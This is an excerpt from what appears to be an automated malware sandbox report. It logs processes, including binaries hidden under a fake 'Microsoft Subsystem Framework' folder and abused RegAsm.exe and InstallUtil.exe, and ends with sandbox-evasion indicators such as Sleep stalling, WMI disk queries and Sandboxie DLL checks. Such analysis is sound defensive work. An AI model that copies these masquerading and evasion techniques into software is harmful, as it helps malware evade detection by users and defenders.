                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeStalling execution: Execution stalls by calling Sleepgraph_0-1810
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                        Source: Cerker.exe, 00000028.00000002.3457516161.0000000000B48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL!
                        Source: Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL&
